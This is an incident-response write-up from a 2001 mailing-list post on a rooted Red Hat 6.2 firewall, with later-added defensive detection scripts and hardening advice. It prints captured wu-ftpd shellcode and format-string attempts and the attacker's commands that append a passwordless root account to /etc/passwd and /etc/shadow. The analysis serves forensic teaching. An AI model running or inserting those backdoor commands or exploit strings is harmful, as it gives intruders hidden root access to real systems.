From: Curt Wilson (netw3@NETW3.COM)
Date: Sun Feb 04 2001 - 00:56:45 CST

Curt Wilson, Netw3 Consulting 02/02/2001

This is my first analysis of a Linux box that has been
rooted. This is intended to be somewhat of a teaching
document, and does not assume a large degree of
technical skill. If anyone sees any errors in here or
has any comments, I'd be happy to hear from you at
netw3@netw3.com

The box in question is an unpatched Red Hat Linux
6.2 machine running as an ipchains firewall and IP
masquerade server.

The attackers' main goal in compromising the system
seems to have been setting up a BNC server that
relays connections to IRC networks, along with an
IRC bot. The attacker also used the compromised
Linux system to search for other vulnerable systems
running the Washington University FTP server, using
two exploits (wu-scan and muje), and attempted or
carried out exploits of numerous remote systems
with the statdx exploit. The statdx exploit attacks
the remote procedure call application rpc.statd and
opens an interactive root shell on TCP port 39168.
(For more information on statdx, see the paper by
George Bakos at
http://www.sans.org/y2k/practical/George_Bakos.html.)

The intruder erased the log directory /var/log, which
damaged numerous symlinks. A more careful attacker
would have left this directory intact and edited the
specific log files to erase their tracks. It is clear
from the system analysis that this person is what's
known as a "script kiddie" and does not represent an
advanced attacker.

The intruder appears to have penetrated the system
using an exploit that attacks wu-ftpd. The default
wu-ftpd on Red Hat 6.2 (wu-2.6.0(1) in this case) is
vulnerable; exploit code has been published on the
Internet and is in wide use in the cracker
underground. Patches are available on the Red Hat
website.

Buffer overflow attacks on wu-ftpd take place through
a specially crafted password sequence that includes
shellcode spawning /bin/sh. The IP addresses below
are most likely other compromised systems that the
attackers are using to break into further sites, and
one of them could be the site that was used to crack
this box. Logs of attacks in progress:

211.72.123.250 => external_ip_of_linux_system [21]
LeLmNnNnUSER ftp
NBnPASS 111F11CA?
k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11

151.15.186.199 => external_ip_of_linux_system [21]
Xv+R6-6-
user ftp]-1pass 111F11CA?
k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11a-
3-a-aSITE EXEC %x %x %x %x +%x |%x

156.111.178.186 => external_ip_of_linux_system [21]
EEUSER ftp
QPASS 111F11CA?
k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11

syr-24-95-165-70.twcny.rr.com =>
external_ip_of_linux_system [21]
q-q-q-q-USER ftp
q-%PASS 111F11CA?
k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11

211.250.5.4 => external_ip_of_linux_system [21]
FFUSER ftp
pPASS 111F11CA?
k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11

63.105.115.4 => external_ip_of_linux_system [21]
L'L'0$L)^1L)^1USER ftp
L)k1PASS 111F11CA?
k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11

The wu-ftpd exploit probably allowed the attacker to
bind /bin/sh to a TCP port. The attacker then telnets
to that port and has interactive root access. Another
possibility is that the exploit allows the execution
of arbitrary code, such as appending a username to
the /etc/passwd and /etc/shadow files, which is then
used to log in through the telnet port. Without
detailed logs, it's hard to know exactly what the
attacker did, since they cleaned up some other
commonly exploited services when they first logged
in to the system. It's possible that the attacker
gained initial access by some other means, but the
evidence suggests that these FTP exploits were the
way in. A Red Hat announcement about this problem can
be found at
http://www.redhat.com/support/errata/RHSA-2000-039.html

At some point, this attacker (or other attackers)
placed a script at /bin/psr which adds a user
named "rewt" with root level access and a user
named "mujixi" to the /etc/passwd and /etc/shadow
files:

echo "rewt:x:0:0:root user,,,:/root:/bin/bash" >>/etc/passwd
echo "mujixi:x:666:666:ala care da muje,,,:/tmp:/bin/bash" >>/etc/passwd
echo "rewt::::::::" >>/etc/shadow
echo "mujixi::::::::" >>/etc/shadow
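As an added example, not part of the original analysis, the shell
script below looks for the two traces a backdoor script like /bin/psr
leaves in the account files: accounts other than root with UID 0, and
accounts whose shadow password field is empty. The sample passwd and
shadow files are constructed here so the script runs stand-alone; on
a real system point the functions at /etc/passwd and /etc/shadow, or
at copies taken from the compromised disk.

```shell
#!/bin/sh
# Added example, not from the original post: look for the traces a
# backdoor script such as /bin/psr leaves in the account files.
# Both functions take the file to inspect as their only argument so
# they work on /etc/passwd and /etc/shadow or on copies taken from
# the compromised disk.

# Print every account whose UID is 0 but whose name is not "root".
# The "rewt" line that /bin/psr appends shows up here.
extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Print every account whose password field is empty, i.e. a login
# that needs no password at all ("rewt::::::::" above).
empty_shadow_passwords() {
    awk -F: '$2 == "" { print $1 }' "$1"
}

# Constructed sample files so the script runs stand-alone. The hash
# values are placeholders, not real password hashes.
SAMPLE_DIR=$(mktemp -d)
cat > "$SAMPLE_DIR/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
curt:x:500:500:Curt Wilson:/home/curt:/bin/bash
rewt:x:0:0:root user,,,:/root:/bin/bash
mujixi:x:666:666:ala care da muje,,,:/tmp:/bin/bash
EOF
cat > "$SAMPLE_DIR/shadow" <<'EOF'
root:HASH_PLACEHOLDER:11300:0:99999:7:::
bin:*:11300:0:99999:7:::
curt:HASH_PLACEHOLDER:11300:0:99999:7:::
rewt::::::::
mujixi::::::::
EOF

echo "UID 0 accounts other than root:"
extra_uid0_accounts "$SAMPLE_DIR/passwd"
echo "accounts with an empty password field:"
empty_shadow_passwords "$SAMPLE_DIR/shadow"
```

Run awk and the shell from a known-good medium (a boot floppy or a
mounted copy of the disk): the rootkit on this box replaced ps,
netstat, ifconfig and top, and nothing guarantees it stopped there.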

After obtaining root access, attacker modified multiple
system files and scripts to cover their tracks:

/etc/rc.d/rc.sysinit has been modified to run the
following:

        /usr/sbin/sshd2
        /usr/sbin/gpm.root
        /usr/sbin/gpm.root

/usr/sbin/gpm.root appears to be controlled by a
config file /etc/gpm-root.conf and contains the
following commands:

cd /usr/X11R6/include/X11/...

This directory (named "...") is invisible to the
standard ls command, but shows up with ls -a, which
displays all files. This is a common attacker trick.
Most of the attacker's tools were placed in this
directory.
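As an added example, not from the original post, the shell function
below lists every directory under a given tree whose name begins with
a dot, which is how the "..." directory above stays out of a plain ls.
Outside home directories such names have no legitimate reason to
exist, so any hit under /usr, /lib, /dev, /var or /tmp deserves a
look. The sample tree is constructed so the script runs stand-alone.

```shell
#!/bin/sh
# Added example, not from the original post: find directories hidden
# behind a leading dot, the trick used for /usr/X11R6/include/X11/...

hidden_dirs() {
    # $1: root of the tree to search. Every directory contains the
    # real entries "." and "..", so those two names are excluded;
    # "..." and ". " (dot space) are the classic attacker choices.
    # Only portable find options are used so this also works with
    # the find on an old Red Hat box or a rescue disk.
    find "$1" -type d -name '.*' ! -name '.' ! -name '..' 2>/dev/null | sort
}

# Constructed sample tree standing in for /usr/X11R6/include/X11 on
# the compromised system: one hidden "..." directory holding a
# sniffer, one ". " directory, and one ordinary directory.
SAMPLE_ROOT=$(mktemp -d)
mkdir -p "$SAMPLE_ROOT/X11/..." "$SAMPLE_ROOT/X11/. " "$SAMPLE_ROOT/X11/extensions"
touch "$SAMPLE_ROOT/X11/.../linsniffer"

hidden_dirs "$SAMPLE_ROOT"
```

On a live system run it as hidden_dirs /usr (and likewise for /dev,
/lib, /var and /tmp); the find binary itself should come from trusted
media for the same reason as every other tool used during the review.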

./linsniffer > tcp.log &

linsniffer captures logins and passwords in a shared
Ethernet environment. A switched network makes this
attack more difficult.
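The replaced ifconfig on this box hides the promiscuous mode that a
sniffer like linsniffer puts the interface into, so the check has to
come from somewhere other than the box's own ifconfig. As an added
example, not from the original post, the script below reads the
interface flags the kernel exposes under /sys (2.6 and later kernels,
so not the Red Hat 6.2 system analysed here) and tests the IFF_PROMISC
bit directly. The flag values used for the stand-alone run are
constructed.

```shell
#!/bin/sh
# Added example, not from the original post: decide whether an
# interface is in promiscuous mode without trusting ifconfig.
# IFF_PROMISC is 0x100 in the kernel's if.h.

is_promisc() {
    # $1: interface flags as a hex string, e.g. the contents of
    # /sys/class/net/eth0/flags. Succeeds when IFF_PROMISC is set.
    [ $(( $1 & 0x100 )) -ne 0 ]
}

report_iface() {
    # $1: interface name. Prints "<iface>: PROMISC" or "<iface>: ok".
    flags=$(cat "/sys/class/net/$1/flags") || return 1
    if is_promisc "$flags"; then
        echo "$1: PROMISC"
    else
        echo "$1: ok"
    fi
}

# Constructed flag values for a stand-alone run: 0x1003 is a normal
# UP|BROADCAST|MULTICAST interface; 0x1103 is the same with
# IFF_PROMISC set, which is what a running sniffer produces.
for sample in 0x1003 0x1103; do
    if is_promisc "$sample"; then
        echo "flags $sample: PROMISC"
    else
        echo "flags $sample: ok"
    fi
done

# On a live system, check every interface the kernel knows about:
#   for i in /sys/class/net/*; do report_iface "$(basename "$i")"; done
```

The kernel also logs a message when an interface enters promiscuous
mode, so a syslog copy shipped to another host records the sniffer
even after the local /var/log has been erased as it was here.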

/usr/sbin/sshd2 -p 1983

Attacker runs an SSH server on port 1983.

After exploiting the system for root access, the
attacker appears to have added a username "muje1" to
the /etc/passwd and/or /etc/shadow files with a group
ID of 501. The attacker also edited the /etc/ftpusers
file, perhaps allowing more users to log in through
FTP than the original setting. Other suspicious user
IDs include "muje", and suspicious group IDs include
1018 and 1004.

Next, the attacker kills all instances of the lpd
process. This is probably so others won't exploit
"his" system through an lpd buffer overflow (never
mind that lpd was not an open port from the outside;
the attacker wanted to secure his own access). The
attacker also removed the portmapper startup file
/etc/rc.d/init.d/portmap, which stopped the
portmapper from listening on TCP port 111 (never
mind that portmapper was not an open port from the
outside either). The attacker then cleans up by
running "updatedb", removing a package named
srk.tar.gz (which might be a rootkit), and removing
the home directories of users muje and muje1.

The intruder appears to have replaced various system
binaries such as netstat, ps, ifconfig, and top to
cover their tracks. The replaced version of ps does
not show activity such as the linsniffer, and the
replaced version of ifconfig does not show the
interface running in promiscuous mode. The other
replaced binaries are most likely tailored to hide
the attacker's activities from administrators' eyes.
These replacements may have been done with
srk.tar.gz. I was unable to find a published tool
named "srk" but the "rk" suggests a rootkit. Please
see
http://packetstorm.securify.com/UNIX/penetration/rootkits/
for a large selection of rootkits.

The group ID 1018 appears to have run the rootkit.
The system binaries that were replaced by this
activity are as follows:

-rwxr-xr-x 1 1018 users 19840 Nov 25 1998 /sbin/ifconfig
-rwxr-xr-x 1 1018 users 33280 Dec 27 1998 /bin/ps
-rwxr-xr-x 1 1018 users 35300 Jan 2 1999 /bin/netstat
-rwxr-xr-x 1 1018 users 53588 Jan 12 1999 /usr/bin/top
-rwxr-xr-x 1 1018 users 13621 Dec 19 10:14 /bin/vobiscu (unfamiliar)
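The listing above gives the rootkit away in a way that is easy to
automate: ls prints a bare number in the owner or group column only
when that UID or GID has no entry in /etc/passwd or /etc/group, and a
system binary owned by an unknown group is never a normal state. As an
added example, not from the original post, the script below pulls such
entries out of a long listing. The sample listing is constructed from
the lines in this analysis plus two clean entries.

```shell
#!/bin/sh
# Added example, not from the original post: pick out entries in an
# "ls -l" style listing whose owner or group is an unresolved number.

flag_unresolved_owner() {
    # Reads "ls -l" lines on stdin and prints the path (last field) of
    # each entry whose owner (field 3) or group (field 4) is purely
    # numeric, i.e. not resolvable through passwd or group.
    awk '$3 ~ /^[0-9]+$/ || $4 ~ /^[0-9]+$/ { print $NF }'
}

# On the live system the same question is answered directly by find,
# which is worth running over every system binary directory:
#   find /bin /sbin /usr/bin /usr/sbin \( -nouser -o -nogroup \) -ls
# For a listing saved earlier (or taken on a box whose find cannot be
# trusted), feed it through the function instead.

# Constructed sample: lines from the analysis plus two clean entries
# (/bin/ls and /bin/cat) for contrast.
SAMPLE_LISTING='-rwxr-xr-x 1 root root 43024 Feb 5 2000 /bin/ls
-rwxr-xr-x 1 1018 users 19840 Nov 25 1998 /sbin/ifconfig
-rwxr-xr-x 1 1018 users 33280 Dec 27 1998 /bin/ps
-rwxr-xr-x 1 root root 9528 Feb 5 2000 /bin/cat
-rw-r--r-- 1 1004 users 307 Aug 31 1998 /usr/man/man6/ssh_config
-rw-rw-r-- 1 root 501 117 Jan 13 21:01 /dev/caca'

printf '%s\n' "$SAMPLE_LISTING" | flag_unresolved_owner
```

Note that /dev/caca is caught as well: its owner resolves to root but
its group 501 does not, which is the same signature the attacker left
on the key and configuration files in /usr/man/man6.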

The group ID 1004 created the following files of
interest:

[root@fortran /dev]# ls -al /dev/caca
-rw-rw-r-- 1 root 501 117 Jan 13 21:01 /dev/caca

[root@fortran /dev]# strings /dev/caca
1 193.226.125
1 193.230.192
1 194.102.218
1 193.231.249
3 31221
3 31337
3 89898
3 44113
3 31223
3 22546
3 666
4 6666

31337 is commonly used in the computer
underground. Many Trojan horse applications listen
on port 31337. It is a variation of the word “elite”. 666
is used by attackers, and port 6666 may refer to an
IRC or BNC server.

-rw-rw-r-- 1 root 501 97 Jan 13 21:01 /dev/dsx

[root@fortran /netw3]# strings /dev/dsx | more
3 psybnc
3 wu-scan
3 muje
3 statdx
3 sl2
3 sshd2
3 linsniffer
3 smurf
3 slice
3 mech
3 muh
3 bnc

/dev/dsx appears to be a listing of what the attacker
has installed.

-rw-rw-r-- 1 root 501 12288 Jan 13 21:01 /etc/psdevtab

[root@fortran .ssh]# ls -al /root/.ssh
total 16
drwxr-xr-x 2 root 501 4096 Jan 24 00:17 .
drwxr-x--- 8 root root 4096 Feb 2 18:54 ..
-rw------- 1 root root 663 Jan 28 20:41 known_hosts
-rw------- 1 root 501 512 Jan 28 20:41 random_seed

-rw-r--r-- 1 1004 users 307 Aug 31 1998 /usr/man/man6/ssh_config
-rw------- 1 root 501 552 Jan 13 21:01 /usr/man/man6/ssh_host_key
-rw-rw-r-- 1 root 501 356 Jan 13 21:01 /usr/man/man6/ssh_host_key.pub
-rw------- 1 root 501 512 Feb 3 04:55 /usr/man/man6/ssh_random_seed
-rw-r--r-- 1 1004 users 697 Dec 27 1998 /usr/man/man6/sshd_config

/usr/man/man6 is also used by attacker(s) to store
SSH key and configuration files.

The following ports are open and listening on the local
(192.168) interface of the system:

21 ftp # point of entry
22 ssh # activated by attacker
23 telnet
25 smtp
79 finger
98 linuxconf
113 auth
513 rlogin
514 rsh
515 lp
1983 ssh # activated by attacker

The primary user that ran the BNC server appears to
go by the name of "bulangia" or "buLaneL"
or "bulanel", and a secondary user goes by the name
of "NINA16". There is evidence of multiple
connections to Bulgarian and Italian IRC networks and
remote systems. Some of the hosts that used the
BNC server include 5dial86.xnet.ro and
11dial217.xnet.ro. Various IRC servers were visited
by these users, and if further action were warranted,
an investigation could connect to the same IRC
networks and attempt to track these people down.

Attacker(s) also installed what appears to be an IRC
bot going by the name of “eddy” or “eddybot”. The
software package used to implement this bot was
called emech-2.8 and the config file for e-mech
reveals details such as an ircname of “H-a-c-k T-h-e
F-u-c-k-i-n-g P-l-a-n-e-t !” and channels such
as “#Linux_mafia”. The linkpass and entityname are
present in the config and users file, which could allow
counterintelligence to be performed if desired.

Recommendations:

Apply patches to Red Hat systems running ipchains
firewalls. Red Hat 6.2 has nearly 50 security patches.
See http://www.redhat.com/support/errata/rh62-errata-security.html.

Several accounts and passwords were obtained
through the use of the linsniffer application. A
switched environment can help reduce the risk of
sniffing attacks.

Lock down systems to provide "defense in depth". Do
not simply rely upon ipchains to block hostile traffic.
Deny all traffic except what is specifically allowed.
Comment out services in /etc/services that do not
need to be run (finger, etc.) as well as in /etc/rc.d.
If the FTP service will be used, make sure
that /etc/ftpusers only allows specific usernames. If
an attacker pierces the firewall, limit what is
available by turning off everything that is not
needed, leaving only those services that are truly
necessary.

Portsentry, which is running on the system, is a nice
addition, but obviously did not help in this instance.
Since the wu-ftpd vulnerabilities are widely known,
the attacker only had to find TCP port 21 open with
a banner that identified a vulnerable version of
wu-ftpd. The use of TCP wrappers and ipchains to
restrict access to ftpd would be helpful. Modify the
banners of listening services to show false
information and confuse attackers and automated
exploit/scanning applications.
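As an added illustration, not from the original post, of the TCP
wrappers restriction suggested above: on Red Hat 6.2 in.ftpd is
started from inetd through tcpd, so the two files below refuse every
wrapped service unless a rule in hosts.allow matches. The internal
network 192.168.1.0/24 is an assumed value; the unrestricted state is
simply an empty hosts.deny, which is what the box had.

```text
# /etc/hosts.deny -- refuse anything not explicitly allowed
ALL: ALL

# /etc/hosts.allow -- FTP only from the internal LAN, nothing else
in.ftpd: 192.168.1.0/255.255.255.0
```

The matching ipchains rule (accept port 21 only from the internal
interface, default policy DENY) belongs alongside this so the
restriction holds even if tcpd is bypassed. Note also that
/etc/ftpusers lists the accounts that are refused FTP access (root,
bin, daemon and so on by default), so every account with no business
using FTP belongs in it.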

Systems management should never be performed
over an unencrypted connection such as telnet.
Install SSH on the server and on your client systems
and use it. This encrypts connections and makes it
much harder for an attacker to obtain your login
credentials.

An intrusion detection system such as Snort
(www.snort.org) is inexpensive, easy to configure,
and in wide use. Snort can monitor a network and
alert a network manager (with the proper
configuration) via pager or email that an attack is
taking place. Tripwire is a file integrity monitor
that can be used to take a snapshot of certain key
system files (such as ps, netstat, ifconfig, and many
more). When these key system files are changed, an
alert can be generated to notify that something
suspicious is taking place. There are freeware/GPL
options for SSH (OpenSSH) and a freeware Tripwire
clone available on the Internet (see
www.whitehats.com for a large collection of open
source security tools).

Curt Wilson - Netw3 Consulting
netw3@netw3.com